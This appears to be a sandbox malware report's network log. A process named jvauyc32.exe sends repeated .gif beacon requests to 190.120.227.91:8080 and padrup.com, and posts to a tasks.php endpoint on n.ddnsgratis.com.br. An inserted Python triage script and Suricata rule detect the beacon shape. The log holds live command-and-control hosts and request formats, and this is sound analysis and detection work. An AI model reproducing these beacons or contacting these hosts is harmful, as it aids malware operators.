                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.602885962 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODEyNy4yMzY4OjE3YzcyOWJhZDk5Y2VmOWM4NGY3MTdmNjViYTdjN2U4ODE0YWM1MDQ3ZGVmOGMzMWRhZmU0MGJhZGY4MGIzOTE6NjcxMjNiN2YzOWQwYw==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.602900028 CEST764INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.9 | 49726 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:42:07.652932882 CEST | 168 | OUT | GET /sobakavolos.gif?22aca7d=145435124 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.9 | 49727 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:42:12.168298960 CEST | 155 | OUT | GET /sobaka1.gif?2a61d79=222204765 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:42:13.239604950 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:42:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_n+rvnpoWDroweTYFuey9nviPnJvFuxFYouUD5bCKDc0Ot+jOBltLrwknr/uWekwOifL+mb3phwEM1UQrO6W0Hg==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:42:13.239654064 CEST | 212 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODEzMi44ODYxOjA3MGQwNThjNTg2YTg1MGUwNjdiNjAzZGMyYjU1NGNjZTU2NTQzOTkyYzgxMjYzY2QwNTMzYTY2YmZ
Oct 18, 2024 12:42:13.239662886 CEST | 1236 | IN | Data Raw: 6d 59 32 56 68 5a 57 49 36 4e 6a 63 78 4d 6a 4e 69 4f 44 52 6b 4f 44 55 32 4f 51 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72
Data Ascii: mY2VhZWI6NjcxMjNiODRkODU2OQ==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';
Oct 18, 2024 12:42:13.239674091 CEST | 552 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32
Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123b85&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '7c1b7a6011abeaa3fefb06cb1dbc7dd361467c83048');</script><s
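
The two sessions above share one request shape: a GET for a short .gif name with a single hex-looking key and a decimal value as the query string, a hard-coded "MSIE 7.0b" User-Agent, Cache-Control: no-cache and no Accept header, sent either to a raw IP on port 8080 or to padrup.com, which answers the .gif request with an HTML page. The following script is an added triage example and is not part of the Joe Sandbox report. It parses request and response text reconstructed from sessions 10 and 11 (request line, request headers and the response headers shown; bodies omitted) plus one constructed benign control, scores the beacon indicators, and generates a Suricata rule for the observed shape. The indicator names, the 6-8 hex-character query heuristic, the reading of the X-Redirect/X-Template headers as a domain-parking template, and the rule text are the example's own assumptions, not statements the report makes.

```python
"""Beacon triage over the HTTP records above (added example, not report code)."""
import re
from dataclasses import dataclass

FIXED_UA = "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
BEACON_PATH = re.compile(r"^/[a-z0-9]+\.gif$")
BEACON_QUERY = re.compile(r"^[0-9a-f]{6,8}=[0-9]+$")    # assumed shape, e.g. 22aca7d=145435124
RAW_IP_HOST = re.compile(r"^\d{1,3}(\.\d{1,3}){3}(:\d+)?$")

# (session, dst_port, request, response): reconstructed from sessions 10 and 11 above,
# headers only; session 99 is a constructed benign control, not from the report.
SAMPLES = [
    (10, 8080,
     "GET /sobakavolos.gif?22aca7d=145435124 HTTP/1.1\r\n"
     "User-Agent: " + FIXED_UA + "\r\nHost: 190.120.227.91:8080\r\n"
     "Cache-Control: no-cache\r\n\r\n", ""),                         # no reply captured
    (11, 80,
     "GET /sobaka1.gif?2a61d79=222204765 HTTP/1.1\r\n"
     "User-Agent: " + FIXED_UA + "\r\nHost: padrup.com\r\nCache-Control: no-cache\r\n\r\n",
     "HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html; charset=UTF-8\r\n"
     "X-Redirect: skenzo\r\nX-Template: tpl_CleanPeppermintBlack_twoclick\r\n"
     "X-Pcrew-Blocked-Reason: hosting network\r\nX-Domain: padrup.com\r\n\r\n"),
    (99, 80,
     "GET /logo.gif?v=3 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0) Chrome/118.0\r\n"
     "Host: www.example.com\r\nAccept: image/avif,image/webp,*/*\r\n\r\n",
     "HTTP/1.1 200 OK\r\nContent-Type: image/gif\r\nContent-Length: 43\r\n\r\n"),
]

@dataclass
class HttpRecord:
    session: int
    dst_port: int
    method: str
    path: str
    query: str
    req: dict        # request headers, names lower-cased
    resp: dict       # response headers, {} when nothing was captured

def _headers(block: str) -> dict:
    """Header lines after the request/status line, up to the blank line."""
    out = {}
    for line in block.split("\r\n")[1:]:
        if not line:
            break
        name, _, value = line.partition(":")
        out[name.strip().lower()] = value.strip()
    return out

def parse_record(session: int, dst_port: int, request: str, response: str = "") -> HttpRecord:
    method, target, _ = request.split("\r\n", 1)[0].split(" ", 2)
    path, _, query = target.partition("?")
    return HttpRecord(session, dst_port, method, path, query,
                      _headers(request), _headers(response) if response else {})

def beacon_indicators(rec: HttpRecord) -> list:
    """Independent weak signals; the verdict needs the two strongest together."""
    hits = []
    if rec.method == "GET" and BEACON_PATH.match(rec.path) and BEACON_QUERY.match(rec.query):
        hits.append("gif-with-random-query")        # cache-busting token, not a real image name
    if rec.req.get("user-agent") == FIXED_UA:
        hits.append("fixed-legacy-user-agent")      # identical hard-coded string in every session
    if RAW_IP_HOST.match(rec.req.get("host", "")):
        hits.append("raw-ip-host")
    if rec.dst_port not in (80, 443):
        hits.append("nonstandard-port")
    if "accept" not in rec.req:
        hits.append("no-accept-header")             # browsers send Accept when fetching images
    return hits

def is_sality_like(rec: HttpRecord) -> bool:
    hits = beacon_indicators(rec)
    return "gif-with-random-query" in hits and "fixed-legacy-user-agent" in hits

def response_verdict(rec: HttpRecord) -> str:
    """What the server actually answered; HTML for a .gif request is the telling case."""
    if not rec.resp:
        return "no-response-captured"
    ctype = rec.resp.get("content-type", "")
    if ctype.startswith("image/"):
        return "image-served"
    if rec.path.endswith(".gif") and ctype.startswith("text/html"):
        # Assumption: X-Redirect/X-Template are a parking template, i.e. the name
        # now points at a landing page rather than live C2 content.
        parked = "x-redirect" in rec.resp or "x-template" in rec.resp
        return "parked-landing-page" if parked else "html-for-gif-request"
    return "other"

def suricata_rule(sid: int = 1000001) -> str:
    """Assumed rule text for the observed shape; validate with `suricata -T` before use."""
    return ('alert http $HOME_NET any -> $EXTERNAL_NET any ('
            'msg:"Sality-style .gif beacon with fixed MSIE 7.0b User-Agent"; '
            'flow:established,to_server; http.method; content:"GET"; '
            'http.uri; pcre:"/^\\/[a-z0-9]+\\.gif\\?[0-9a-f]{6,8}=[0-9]+$/"; '
            'http.user_agent; content:"MSIE 7.0b"; '
            'classtype:trojan-activity; sid:' + str(sid) + '; rev:1;)')

def analyse(samples=SAMPLES) -> dict:
    out = {}
    for args in samples:
        rec = parse_record(*args)
        out[rec.session] = {"indicators": beacon_indicators(rec),
                            "sality_like": is_sality_like(rec),
                            "response": response_verdict(rec)}
    return out

if __name__ == "__main__":
    for session, verdict in analyse().items():
        print(session, verdict)
    print(suricata_rule())
```

Two points of the design: the verdict is deliberately tied to the two strongest indicators (URL shape plus the fixed User-Agent) so that a benign .gif with a short cache-buster is not flagged, and the response classification is kept separate from the beacon verdict, because a beacon is still a beacon when the server has gone away. The parked-page reading of the padrup.com responses is an interpretation of the visible headers; the report itself only records the traffic.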


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.9 | 49728 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:42:13.298513889 CEST | 167 | OUT | GET /sobakavolos.gif?2c5425f=92964030 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          13192.168.2.949729185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:42:17.541049004 CEST | 154 | OUT | GET /sobaka1.gif?333df63=53731171 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:42:18.602365971 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:42:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_BiNqxWuKcfCoBvcim8uYs5ni2qblGXs003+2bMBi+R8WMI1rM1ORtyWFlvqNxvRM1rEQ7xCmlvI9g3X3Fz2EdQ==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Ascii: 1e0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:42:18.602384090 CEST | 1236 | IN | Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODEzOC4yNjIzOjY5NWJlZDM4NjYzZTI3ODk4MTlhYjdlZDEzYWViZjcxZjZmMDQ4MGJmMzhjNmQ0YmUw6f9NGFkMmVhNTY0OWI4MDU6NjcxMjNiOGE0MDA
Oct 18, 2024 12:42:18.602488995 CEST | 424 | IN | Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }
Oct 18, 2024 12:42:18.602500916 CEST | 340 | IN | Data Ascii: 5594013ab447f3');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.9 | 49730 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:42:18.621656895 CEST | 168 | OUT | GET /sobakavolos.gif?352e846=390355434 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.9 | 49731 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:42:23.451464891 CEST | 155 | OUT | GET /sobaka1.gif?3d3b9b1=192621843 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:42:24.726543903 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:42:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_f9Iiz4upIrRuYENXmsH3tjU9PQfJov+YPoVdTtGyRHpNSmE6fb5auFieZCI0ADUrfisnDpaPF9MrBGHo77kfqQ==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:42:24.726589918 CEST | 1236 | IN | Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE0NC4wMjAzOjg2YmU4YWFiNDhiYzkxMzE1ZjBhYTIwYmQ3ZDdkNDJlYWYyZTU0YzQwNzlkYTgyZWU4YjBhOTdmYzU0OWVkYzY6NjcxMjNiOTAwNGYzNA==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.726600885 CEST424INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.726605892 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 37 61 62 62 34 33 34 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                                                                          Data Ascii: 1467abb434');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.726713896 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 37 61 62 62 34 33 34 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                                                                          Data Ascii: 1467abb434');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.730823994 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:42:24 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_f9Iiz4upIrRuYENXmsH3tjU9PQfJov+YPoVdTtGyRHpNSmE6fb5auFieZCI0ADUrfisnDpaPF9MrBGHo77kfqQ==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.732449055 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE0NC4wMjAzOjg2YmU4YWFiNDhiYzkxMzE1ZjBhYTIwYmQ3ZDdkNDJlYWYyZTU0YzQwNzlkYTgyZWU4YjBhOTdmYzU0OWVkYzY6NjcxMjNiOTAwNGYzNA==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.732451916 CEST424INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.732455969 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 37 61 62 62 34 33 34 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                                                                          Data Ascii: 1467abb434');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.9 | 49732 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:42:24.846174002 CEST | 168 | OUT | GET /sobakavolos.gif?3ff2df5=201165279 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.9 | 49733 | 194.5.152.215 | 80 | 7352 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:42:25.224838018 CEST | 272 | OUT | POST /n/tasks.php HTTP/1.0
Host: n.ddnsgratis.com.br
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
Content-type: application/x-www-form-urlencoded
Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b
Content-length: 12
Data Raw: 5f 77 76 3d 5a 57 35 30 5a 58 49 3d 0a
Data Ascii: _wv=ZW50ZXI=
Oct 18, 2024 12:42:31.335000992 CEST | 586 | IN | HTTP/1.1 404 Not Found
Date: Fri, 18 Oct 2024 10:42:26 GMT
Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14
X-Powered-By: PHP/5.6.14
Status: 404 Not Found
Content-Length: 357
Content-Type: text/html; charset=utf8
